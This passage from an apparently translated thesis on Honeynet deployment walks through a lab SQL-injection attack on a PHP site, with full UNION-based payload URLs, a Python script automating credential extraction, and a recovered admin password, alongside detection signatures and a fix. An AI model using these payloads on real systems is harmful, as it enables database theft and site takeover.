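    findings = []
    lan = ipaddress.ip_network(conf["HwLAN_IP_RANGE"])

    if conf.get("HwHONEYWALL_RUN") != "yes":
        findings.append("HwHONEYWALL_RUN is not yes: bridge and data control will not start at boot")

    # Every honeypot address must sit inside the bridged LAN range.
    for ip in conf.get("HwHPOT_PUBLIC_IP", "").split():
        if ipaddress.ip_address(ip) not in lan:
            findings.append(f"honeypot {ip} is outside HwLAN_IP_RANGE {lan}")

    # Sebek: collector enabled, packets kept inside, client and server agree.
    if conf.get("HwSEBEK") != "yes":
        findings.append("HwSEBEK is not yes: sebekd will not collect keystrokes from the honeypots")
    if conf.get("HwSEBEK_FATE") != "DROP":
        findings.append("HwSEBEK_FATE should be DROP so Sebek packets never leave the Honeynet")
    if sebek_client["DESTINATION_IP"] != conf.get("HwSEBEK_DST_IP"):
        findings.append(f"Sebek client sends to {sebek_client['DESTINATION_IP']} "
                        f"but the Honeywall collects on {conf.get('HwSEBEK_DST_IP')}")
    if sebek_client["DESTINATION_PORT"] != conf.get("HwSEBEK_DST_PORT"):
        findings.append("Sebek client and Honeywall disagree on the Sebek UDP port")

    # Management must be out of band: its own NIC and a subnet outside the honeypot LAN.
    if conf.get("HwMANAGE_IFACE") in (conf.get("HwINET_IFACE"), conf.get("HwLAN_IFACE")):
        findings.append("management interface shares a NIC with the bridge")
    if ipaddress.ip_address(conf["HwMANAGE_IP"]) in lan:
        findings.append("management IP lies inside the honeypot LAN range")
    if "22" in conf.get("HwALLOWED_TCP_IN", "").split():
        findings.append("HwALLOWED_TCP_IN must not list the SSH port; roo adds it itself")

    # Without outbound restriction a compromised honeypot is a free attack box.
    if conf.get("HwRESTRICT") != "yes":
        findings.append("HwRESTRICT is not yes: honeypots may reach any destination port")
    return findings


if __name__ == "__main__":
    for finding in lint(parse_conf(HONEYWALL_CONF), SEBEK_CLIENT):
        print("FINDING:", finding)
```

Run against the page's values it reports exactly the three mismatches described above; set the two flags to yes and point the Sebek client at 10.0.0.253 and the list is empty.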

Figure 4.4 - Configuring the public IP addresses of the honeypots

Figure 4.5 - Configuring the destination IP address for Sebek packets

Figure 4.6 - Choosing how the Honeywall handles Sebek packets

Figure 4.7 - Configuring the IP address of the management interface (eth2)

Figure 4.8 - Configuring the default gateway of the management interface

Figure 4.9 - After configuration the Honeywall restarts its services

The complete Honeywall.conf can be found in the appendix. Once the Honeywall is configured, it can be managed through the web interface at https://10.0.0.66 (shown below). This is the address of the management interface, i.e. the value of HwMANAGE_IP; the listing above sets it to 10.10.10.66, so the address used must match whatever was actually configured.

Figure 4.10 - Honeywall management interface

2.2 Installing and configuring Sebek

a) Installation

The Sebek client is installed on each honeypot to capture what the attacker does on that honeypot.

Installing the Sebek client on Windows:
- download Sebek Win32 3.0.5.zip
- unzip it and run Setup.exe
- after installation, configure the client with the Configuration Wizard.exe program (the parameters are described under configuration below)

Installing the Sebek client on Linux Red Hat 9.0:
- download sebek-linux-3.0.5.tar.gz
- build it:
    tar xzf sebek-linux-3.0.5.tar.gz
    cd sebek-linux-3.0.5
    ./configure
    make
    make install
- the build produces sebek-linux-3.0.5-bin.tar; unpack it and enter the directory:
    tar xf sebek-linux-3.0.5-bin.tar
    cd sebek-linux-3.0.5-bin
- finish by running the install script:
    ./sbk_install.sh

Note: before running sbk_install.sh, edit it to set the Sebek client parameters described in the next section.

b) Configuration

The basic parameters used to configure the Sebek client are:

* On Linux (in sbk_install.sh):

#----- DESTINATION_IP:
#----- sets destination IP for sebek packets
DESTINATION_IP="192.168.1.253"

This must match the Sebek destination address entered when configuring the Honeywall (HwSEBEK_DST_IP).

#----- DESTINATION_MAC:
#----- sets destination MAC addr for sebek packets
DESTINATION_MAC="00:20:ED:00:00:00"

This is the MAC address of the internal interface (eth1) on the Honeywall.

#----- DESTINATION_PORT:
#----- defines the destination udp port sebek sends to
DESTINATION_PORT=1101

* On Windows:

Figure 4.11 - Sebek client configuration on Windows

3. Operating the Honeynet and analysing the attacker's technique

Attack scenario

Figure 4.12 - Attack scenario against the Honeynet

The thesis presents a scenario in which a website with a SQL-injection flaw is attacked (a common, high-risk technique), using the Honeynet deployment described above. It proceeds as follows:
- After scanning the network, the attacker finds that the web server (IP address 192.168.1.111) is vulnerable to SQL injection, exploits the flaw and injects malicious SQL in order to take full control of the website.
- Having taken control of the website, the attacker installs a backdoor on the web server for easy return access and control. The attacker then alters the site's content, posting defacing text and images, and plants malware on the site to spread it across the network.

All of the attacker's activity against the Honeynet is recorded in full detail. The analyst then examines the information collected by the Honeynet, with the help of the Walleye management and analysis tool, to establish:
- how the attack unfolded, step by step
- the tools the attacker used (exploitation tools such as Metasploit or Retina Network Security Scanner; SQL-injection scanners such as Scrawlr 1.0; ...)
- the techniques the attacker used

The analysis is presented in detail in the following section.

Analysing the attacker's technique

How the attacker compromises the website

Below is the online car magazine website at http://192.168.1.111/genu that has a SQL-injection flaw and that we will attack:

Figure 4.13 - The website that will be attacked

Before walking through the attack, note the catalog objects an attacker relies on: in SQL Server the sysobjects and syscolumns tables list every table and column in the database, and the system view INFORMATION_SCHEMA.TABLES holds information about all tables on the server. The queries that follow, however, use information_schema together with database() and group_concat(), which are MySQL functions, and the vulnerable page is a PHP script (read.php); the database behind this scenario is therefore MySQL (or compatible) rather than the SQL Server listed in the component table. It is this catalog information that we use to exploit the site and obtain its administrator (admin) account.

The attacker discovers the SQL-injection flaw by appending a single quote to the URL http://192.168.1.111/genu/articles/read.php?article_id=1' and the site responds with the error:

Error in query "SELECT genu_articles.article_date, genu_articles.article_subject, genu_articles.article_text, genu_users.user_id, genu_users.user_name FROM genu_articles, genu_users WHERE genu_articles.user_id = genu_users.user_id AND genu_articles.article_id = 1\'"

The backslash before the quote shows that the application escapes single quotes in its input, but it still pastes the parameter straight into the query, so any input that needs no quotes is executed as SQL. The complete exploitation of the flaw is as follows:

Step 1: Finding the database name

Knowing the site is injectable, we go on to learn the database name. We set article_id to null, a value that matches no article, so that the original query returns nothing, and append a UNION SELECT. UNION appends the rows of a second SELECT to the first, but only when both SELECTs return the same number of columns, so we try increasing column counts until the query stops failing. The first attempt is

http://192.168.1.111/genu/articles/read.php?article_id=null union select 1 from information_schema.tables--

and the attacker receives the following error:

Figure 4.14 - Error message showing the website is vulnerable to SQL injection

Note: the number of columns in the two SELECTs must match, in count and in type. Since we do not know how many columns the original SELECT returns, we add 2, 3, 4, 5, ... to the UNION SELECT one at a time. The last attempt,

http://192.168.1.111/genu/articles/read.php?article_id=null union select 1,2,3,4,5 from information_schema.tables--

returns:

Figure 4.15 - Output showing which column positions can carry injected SQL

Columns 2, 3 and 5 are rendered on the page, so an expression placed in one of them is displayed. We therefore put database() into position 2 to learn the name of the database the site uses:

http://192.168.1.111/genu/articles/read.php?article_id=null union select 1,database(),3,4,5 from information_schema.tables--

The attacker now sees the database name:

Figure 4.16 - The database name

Step 2: Listing the tables in the genu database

We keep using position 2 as in step 1. To list the tables we inject group_concat(table_name), which returns all matching names as a single string:

http://192.168.1.111/genu/articles/read.php?article_id=null union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=CHAR(103,101,110,117)--

Note: CHAR(103,101,110,117) is the database name genu written as character codes. The application escapes single quotes (the earlier error message showed 1\'), so a quoted literal 'genu' would break the query; CHAR() builds the string without quotes. The HackBar tool was used to convert the string to CHAR form. The attacker receives the list of tables in genu:

Figure 4.17 - List of tables in the genu database

The table of interest is genu_users, which holds the user names we are after.

Step 3: Listing the columns of the genu_users table

In the same way as the tables were listed in step 2, we list the columns of the genu_users table found there:

http://192.168.1.111/genu/articles/read.php?article_id=null union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=CHAR(103,101,110,117,95,117,115,101,114,115)--

Note: CHAR(103,101,110,117,95,117,115,101,114,115) is the string genu_users. The attacker receives the columns of genu_users:

Figure 4.18 - List of columns in the genu_users table

The columns obtained: user_id, user_level, user_name, user_password, user_email, user_viewemail, user_website, user_location, user_occupation, user_comments, user_posts, user_votes, user_creation, user_ip, user_language, user_template, user_date_format, user_date_offset, user_lastvisit, user_key, user_day, user_month, user_year, user_avatar

The columns of interest are user_id, user_name and user_password, since they hold the admin account that gives control of the website, the attacker's end goal.

Step 4: Extracting the username and password

Still using position 2, we inject concat() to read the id, user name and password from the user_id, user_name and user_password columns found in step 3:

http://192.168.1.111/genu/articles/read.php?article_id=null union select 1,concat(user_id,char(58),user_name,char(58),user_password),3,4,5 from genu_users--

The attacker receives the final result in the form id:username:password:

Figure 4.19 - The username and password

The credentials obtained: 1:admin:ca5b27f0ec89a3dcbcf7f07e47d446ff9c848c98
Username: admin
Password hash: ca5b27f0ec89a3dcbcf7f07e47d446ff9c848c98

The password is stored as a hash (40 hexadecimal digits, the length of a SHA-1 digest). It could be replaced with an UPDATE statement if the injection allowed statements other than SELECT, which this UNION-based point does not, or the hash can be looked up. Here it was looked up at http://www.md5decrypter.co.uk/ with this result:

Figure 4.20 - The recovered password

The recovered password is xuantrung, so the attacker now holds the admin account: admin/xuantrung
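The four steps above are a manual walk through a UNION-based injection, and the same logic is easily automated. The Python below is an added example (not part of the thesis) that models read.php's query over an in-memory SQLite database constructed here, seeded with the genu_users row from the page, and then performs the attack against it: the quote test, the column-count search, table and column discovery, and the concat()-style credential dump. SQLite has no information_schema and, in the versions bundled with Python, no concat(), so the discovery steps use sqlite_master and pragma_table_info() and the dump uses the || operator; the MySQL forms from the page are given in the comments. The table layout (five columns, joined on user_id) follows the error message quoted earlier.

```python
import sqlite3

# The query read.php builds; {article_id} is where the raw parameter lands.
# Column list and join taken from the "Error in query" message on the page.
READ_PHP_QUERY = (
    "SELECT genu_articles.article_date, genu_articles.article_subject, "
    "genu_articles.article_text, genu_users.user_id, genu_users.user_name "
    "FROM genu_articles, genu_users "
    "WHERE genu_articles.user_id = genu_users.user_id "
    "AND genu_articles.article_id = {article_id}"
)


def build_db():
    """Constructed stand-in for the genu database (MySQL on the real target)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE genu_users(user_id INTEGER, user_name TEXT, user_password TEXT);
        CREATE TABLE genu_articles(article_id INTEGER, user_id INTEGER,
            article_date TEXT, article_subject TEXT, article_text TEXT);
        INSERT INTO genu_users VALUES (1, 'admin', 'ca5b27f0ec89a3dcbcf7f07e47d446ff9c848c98');
        INSERT INTO genu_articles VALUES (1, 1, '2009-05-01', 'Cars', 'Road test');
    """)
    return conn


def read_php(conn, article_id):
    """The vulnerable page: the parameter is pasted straight into the SQL text."""
    try:
        return {"rows": conn.execute(READ_PHP_QUERY.format(article_id=article_id)).fetchall()}
    except sqlite3.Error as e:
        return {"error": str(e)}        # the "Error in query ..." page the attacker sees


def is_injectable(conn):
    """Quote test: a trailing ' breaks the statement only if input reaches the SQL unquoted."""
    return "error" in read_php(conn, "1'")


def find_column_count(conn, max_cols=20):
    """UNION needs equal column counts on both sides; grow 1,2,3,... until the query parses."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        if "error" not in read_php(conn, f"null UNION SELECT {cols}"):
            return n
    return None


def injected_cell(conn, expr, source=""):
    """Place expr in column 2 (one that the page renders) and return what comes back."""
    res = read_php(conn, f"null UNION SELECT 1,{expr},3,4,5 {source}")
    return res["rows"][0][1]


def list_tables(conn):
    # MySQL: group_concat(table_name) FROM information_schema.tables WHERE table_schema=CHAR(...)
    return injected_cell(conn, "group_concat(name)", "FROM sqlite_master WHERE type='table'")


def list_columns(conn, table):
    # MySQL: group_concat(column_name) FROM information_schema.columns WHERE table_name=CHAR(...)
    return injected_cell(conn, "group_concat(name)", f"FROM pragma_table_info('{table}')")


def dump_users(conn):
    # MySQL: concat(user_id,char(58),user_name,char(58),user_password) FROM genu_users
    return injected_cell(conn, "user_id||char(58)||user_name||char(58)||user_password",
                         "FROM genu_users")


if __name__ == "__main__":
    db = build_db()
    print("injectable:", is_injectable(db))
    print("columns in original query:", find_column_count(db))
    print("tables:", list_tables(db))
    print("genu_users columns:", list_columns(db, "genu_users"))
    print("credentials:", dump_users(db))
```

The simulation does not escape quotes, so the discovery queries can use ordinary string literals; on the real target that escaping is exactly why the page reaches for CHAR().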

Having gained control of the website, we can do anything we like with it. Typically, after taking over a site, attackers deface it (change its appearance), install a backdoor to return later, carry out a local attack (attack the other sites hosted on the same web server, since most sites are on shared hosting), or use the site to distribute malware and viruses. Here we deface the site; the difference in appearance can be seen in figures 4.21 and 4.22 below:

Figure 4.21 - The web page before the attack

Figure 4.22 - The web page after defacement

Remarks: after a sequence of vulnerability scanning and injection of SQL to extract information from the database, we have taken control of the website. The question now is whether the Honeynet recorded the whole process. The answer is in the next section, Using the Honeynet to analyse the attacker's technique.

Using the Honeynet to analyse the attacker's technique

With the help of Walleye we obtain the relationships between the data of the attack on the system. Figure 4.23 gives an overview of the network flows into and out of the Honeynet.

Figure 4.23 - Overview of flows into and out of the Honeynet

The figure below shows the packets captured by the Honeywall, displayed in Walleye in the order of the attack steps.

Figure 4.24 - Sequence of captured packets in Walleye

We analyse the attacker's actions against the Honeynet in turn:
- The first packet contains the code (boxed in the figure) that identifies a SQL-injection attack on the web server at 192.168.1.111.

Figure 4.25 - Packet content with the injected SQL

The Honeywall has captured the SQL the attacker injected to exploit the site's flaw:

article_id=null union select 1 from information_schema.tables--

The request executed was:

http://192.168.1.111/genu/articles/read.php?article_id=null union select 1 from information_schema.tables--

Everything after article_id= is the injected text. Here the attacker is probing how many columns the article query returns and which of them can carry injected SQL. The web server's response to this request is:

Figure 4.26 - Content of the response packet

Note: in each of the following steps, the injected text is appended to the application's own query to form the statement actually executed, i.e.

executed statement = SELECT genu_articles.article_date, genu_articles.article_subject, genu_articles.article_text, genu_users.user_id, genu_users.user_name FROM genu_articles, genu_users WHERE genu_articles.user_id = genu_users.user_id AND genu_articles.article_id = <injected text>

This is not repeated for the remaining steps.

Next, the attacker probes with select 1,2,3,4,5. The request used is:

http://192.168.1.111/genu/articles/read.php?article_id=null union select 1,2,3,4,5 from information_schema.tables--

as shown in the figure below, and the web server's response is a complete index page showing that columns 2, 3 and 5 can carry injected SQL:

Figure 4.27 - Packet in which the attacker's first step succeeds

Figure 4.28 - Packet with the web server's response

Once the attacker knows which columns can be injected, database() is placed in column 2 to read the name of the database the site uses. The request used is:

http://192.168.1.111/genu/articles/read.php?article_id=null union select 1,database(),3,4,5 from information_schema.tables--

Figure 4.29 - Packet in which the attacker extracts the database name

and the web server's response:

Figure 4.30 - Packet containing the database name

Analysing the next packet, we again recover the SQL the attacker injected:

article_id=null union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=CHAR(103,101,110,117)--

Figure 4.31 - Packet with the attacker's injected SQL

The purpose of this SQL is to find how many tables the genu database has and to list their names. Further into the packet we see the web server's response as recorded by the Honeywall:

Figure 4.32 - Packet showing the list of tables in genu

In the next packet, having obtained the name of the table that matters, genu_users, the attacker injects SQL to find the columns holding the admin's username and password:

article_id=null union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=CHAR(103,101,110,117,95,117,115,101,114,115)--

Figure 4.33 - Packet with the SQL injected to list columns

This SQL lists the columns of the genu_users table, and the rest of the packet shows the web server returning the list of columns the attacker wanted.

Figure 4.34 - Packet containing the columns of genu_users

From the genu_users information the attacker knows exactly which columns hold the admin account: user_id, user_name and user_password. In the next packet the attacker reads the admin account by injecting:

article_id=null union select 1,concat(user_id,char(58),user_name,char(58),user_password),3,4,5 from genu_users--

Figure 4.35 - Packet with the SQL injected to read the admin account

Further into the same packet, the web server returns the admin account 1:admin:ca5b27f0ec89a3dcbcf7f07e47d446ff9c848c98.

Figure 4.36 - Packet containing the admin account

At this point the attacker can easily recover the password and take control of the website. Having obtained the admin account, we keep watching to see whether the Honeywall notices when the attacker's machine logs in to the site as admin.

Figure 4.37 - Packet showing the website being attacked

The next packet shows in detail what happens once the attacker is inside the site.

Figure 4.38 - Packet showing the website being defaced

After obtaining the admin account and logging in, the attacker defaces the site by changing the content of the page, specifically leaving the text hacked!!!. Below is the attacker's handiwork.

Figure 4.39 - The original website

Figure 4.40 - The defaced website

The Honeywall not only records the attacker's whole process but also helps identify the tools used. In this scenario the attacker found the SQL-injection flaw by appending a special character, a single quote, to the article URL:

http://192.168.1.111/genu/articles/read.php?article_id=1'

Figure 4.41 - The packet the attacker used to test for SQL injection

Figure 4.42 - The packet showing the SQL-injection error

In summary, the Honeywall recorded the attacker's whole attack on http://192.168.1.111/genu/ as follows:
- First, the attacker appended a single quote to the URL and found that the site is vulnerable to SQL injection.
- Next, the attacker used SQL-injection techniques against the site, broke in and took control of it.
- Finally, the attacker altered the site by uploading the image xedap.jpg and changing the article text to hacked!!!
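The reconstruction above was done by reading each captured request in Walleye by hand. The same classification can be done mechanically over the HTTP request lines the Honeywall records. The Python below is an added example (not part of the thesis or of Walleye) that takes request lines like the ones in this scenario (a constructed sample, URL-encoded the way a browser would send them, not real capture data), decodes the query string, labels each request with the attack step it corresponds to, and turns CHAR(...) sequences back into the strings they hide, so that table_schema=CHAR(103,101,110,117) is reported as table_schema='genu'. The signature patterns and labels are mine.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample of request lines as the Honeywall would capture them on the
# bridge: the scenario's eight requests, url-encoded as a browser sends them.
CAPTURED_REQUESTS = [
    "GET /genu/articles/read.php?article_id=1 HTTP/1.1",
    "GET /genu/articles/read.php?article_id=1%27 HTTP/1.1",
    "GET /genu/articles/read.php?article_id=null+union+select+1+from+information_schema.tables-- HTTP/1.1",
    "GET /genu/articles/read.php?article_id=null+union+select+1,2,3,4,5+from+information_schema.tables-- HTTP/1.1",
    "GET /genu/articles/read.php?article_id=null+union+select+1,database(),3,4,5+from+information_schema.tables-- HTTP/1.1",
    "GET /genu/articles/read.php?article_id=null+union+select+1,group_concat(table_name),3,4,5"
    "+from+information_schema.tables+where+table_schema=CHAR(103,101,110,117)-- HTTP/1.1",
    "GET /genu/articles/read.php?article_id=null+union+select+1,group_concat(column_name),3,4,5"
    "+from+information_schema.columns+where+table_name=CHAR(103,101,110,117,95,117,115,101,114,115)-- HTTP/1.1",
    "GET /genu/articles/read.php?article_id=null+union+select+1,concat(user_id,char(58),user_name,"
    "char(58),user_password),3,4,5+from+genu_users-- HTTP/1.1",
]

# Ordered most specific first: the first matching label names the attack step.
SIGNATURES = [
    ("credential dump", re.compile(r"concat\(.*user_password", re.I)),
    ("column enumeration", re.compile(r"information_schema\.columns", re.I)),
    ("table enumeration", re.compile(r"information_schema\.tables\s+where\s+table_schema", re.I)),
    ("database name", re.compile(r"\bdatabase\(\)", re.I)),
    ("column-count probe", re.compile(r"union\s+select\s+(\d+\s*,\s*)*\d+\s+from", re.I)),
    ("quote test", re.compile(r"^\d+'$")),
]


def decode_char_calls(sql):
    """CHAR(103,101,110,117) -> 'genu': recover literals hidden from quote escaping."""
    return re.sub(r"CHAR\(([\d,\s]+)\)",
                  lambda m: "'" + "".join(chr(int(c)) for c in m.group(1).split(",")) + "'",
                  sql, flags=re.I)


def classify(request_line):
    """Return (parameter, decoded payload, label), or None when no signature matches."""
    path = request_line.split(" ")[1]
    # parse_qs already undoes percent-encoding and '+', so the value is decoded once only.
    query = parse_qs(urlsplit(path).query, keep_blank_values=True)
    for name, values in query.items():
        value = values[0]
        for label, pattern in SIGNATURES:
            if pattern.search(value):
                return name, decode_char_calls(value), label
    return None


def reconstruct(lines):
    """Walk the capture in order and keep one entry per hostile request."""
    return [hit for hit in (classify(line) for line in lines) if hit]


if __name__ == "__main__":
    for name, payload, label in reconstruct(CAPTURED_REQUESTS):
        print(f"{label:20} {name}={payload}")
```

Run over the sample, the report lists the quote test, two column-count probes, the database name, table and column enumeration and the credential dump, in that order, with the two CHAR() arguments rendered as 'genu' and 'genu_users'.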

Beyond this, the attacker could install a virus on the site and turn it into a distribution point on the network.

Remarks on the analysis results and remediation of the SQL-injection flaw

The Honeynet produced the following results:
- It shows clearly how the attack took place: the attacker's steps, and what the attacker did after taking control of the honeypot.
- It captured the attacker's techniques: SQL injection, remote execution of a web shell, and virus distribution.
- It can also reveal the tool an attacker uses to find SQL-injection flaws automatically rather than by hand.

The goal of studying the Honeynet is to collect web-service attack techniques, so that security holes and weak points in our sites are found early and fixed in time, keeping both the website and its users safe. It would therefore be a serious omission not to present the fix for the SQL-injection flaw in the site attacked above.

From the information the Honeynet collected, the flaw lies in the file read.php in the /articles directory. Appending a single quote to http://192.168.1.111/genu/articles/read.php?article_id=1 produces the error:

Error in query "SELECT genu_articles.article_date, genu_articles.article_subject, genu_articles.article_text, genu_users.user_id, genu_users.user_name FROM genu_articles, genu_users WHERE genu_articles.user_id = genu_users.user_id AND genu_articles.article_id = 1\'"

This shows that the script passes the article_id parameter into the query without validating it, so any special characters or SQL in the URL become part of the statement. The administrator must therefore force the value of $id to be an integer, after which the attacker cannot inject SQL. Opening read.php in /articles we see:

Figure 4.43 - The original read.php: the query SELECT genu_articles.article_date, genu_articles.article_subject, genu_articles.article_text, genu_users.user_id, genu_users.user_name FROM genu_articles, genu_users WHERE genu_articles.user_id = genu_users.user_id AND genu_articles.article_id = $id

To fix the flaw, we wrap the value in intval() (int for integer, val for value), so that $id is always an integer.

Figure 4.44 - read.php after the fix

The result when the attacker again tries to detect SQL injection by appending a single quote:
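The fix in figure 4.44 relies on intval(): whatever the attacker sends, only an integer reaches the query, and none of the payloads above survive that. One caveat worth knowing: intval("1'") is 1, not an error, so the quote test quietly returns article 1 instead of being rejected, and an application that wants to notice such probes needs a stricter check. The Python below is an added example (not the thesis's read.php) that models both variants over the same constructed in-memory SQLite tables used earlier: a PHP-style intval() coercion, and a strict version that rejects anything but a plain positive integer and binds the value as a query parameter, which is the general defence when a parameter is not numeric.

```python
import re
import sqlite3

# Parameterised form of the read.php query: the ? placeholder is bound by the driver,
# so the value is never interpreted as SQL text.
QUERY = (
    "SELECT genu_articles.article_date, genu_articles.article_subject, "
    "genu_articles.article_text, genu_users.user_id, genu_users.user_name "
    "FROM genu_articles, genu_users "
    "WHERE genu_articles.user_id = genu_users.user_id "
    "AND genu_articles.article_id = ?"
)


def build_db():
    """Constructed minimal genu schema (the real tables have many more columns)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE genu_users(user_id INTEGER, user_name TEXT, user_password TEXT);
        CREATE TABLE genu_articles(article_id INTEGER, user_id INTEGER,
            article_date TEXT, article_subject TEXT, article_text TEXT);
        INSERT INTO genu_users VALUES (1, 'admin', 'ca5b27f0ec89a3dcbcf7f07e47d446ff9c848c98');
        INSERT INTO genu_articles VALUES (1, 1, '2009-05-01', 'Cars', 'Road test');
    """)
    return conn


def intval(value):
    """PHP intval() on a string: leading integer if present, otherwise 0.
    "1'" -> 1, "null union select ..." -> 0."""
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0


def read_article_intval(conn, raw_id):
    """The page's fix: coerce to an integer before the value touches the query."""
    return conn.execute(QUERY, (intval(raw_id),)).fetchall()


def read_article_strict(conn, raw_id):
    """Stricter variant: reject anything that is not a plain positive integer,
    so that probes like 1' can be logged rather than silently normalised."""
    if not re.fullmatch(r"[0-9]+", raw_id):
        raise ValueError("article_id must be a positive integer")
    return conn.execute(QUERY, (int(raw_id),)).fetchall()


def is_rejected(conn, raw_id):
    """True when the strict reader refuses raw_id."""
    try:
        read_article_strict(conn, raw_id)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    db = build_db()
    dump = "null union select 1,concat(user_id,char(58),user_name,char(58),user_password),3,4,5 from genu_users--"
    print("intval, legitimate id:", read_article_intval(db, "1"))
    print("intval, quote test:   ", read_article_intval(db, "1'"))
    print("intval, credential dump:", read_article_intval(db, dump))
    print("strict rejects quote test:", is_rejected(db, "1'"))
```

With intval() the credential-dump payload collapses to article 0 and returns nothing, but the quote test is indistinguishable from a normal request for article 1; the strict reader turns it into an error that can be logged, which is what a honeypot operator wants to see.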

Figure 4.45 - Result after the SQL-injection fix

4. Honeynets in practice today

Many organisations worldwide, especially network-security companies, run Honeynet systems, among them Symantec, Trend Micro and Snort; in Vietnam the Bkis network security centre has also deployed one. These systems work well and are an effective aid to security experts in researching and detecting early the security holes in IT products, new network attack techniques, and new virus and malware samples; in tracing attackers; and in testing network security, thereby helping to protect networks and block unauthorised intrusion.

CONCLUSION

In carrying out the graduation thesis "Research on Honeypot and Honeynet systems to study some web service attack techniques", under the dedicated guidance of Mr Hong S Tng, I have studied and mastered the operation and purpose of the Honeynet system, and am able to deploy, apply and develop Honeynets in practice. Because of limited time and equipment, my research, deployment and practical application of the Honeynet is confined to an experimental scope. Despite my best efforts, this thesis inevitably contains errors. I look forward to the comments and kind help of the teachers and my friends so that it can be improved. Sincerely, thank you.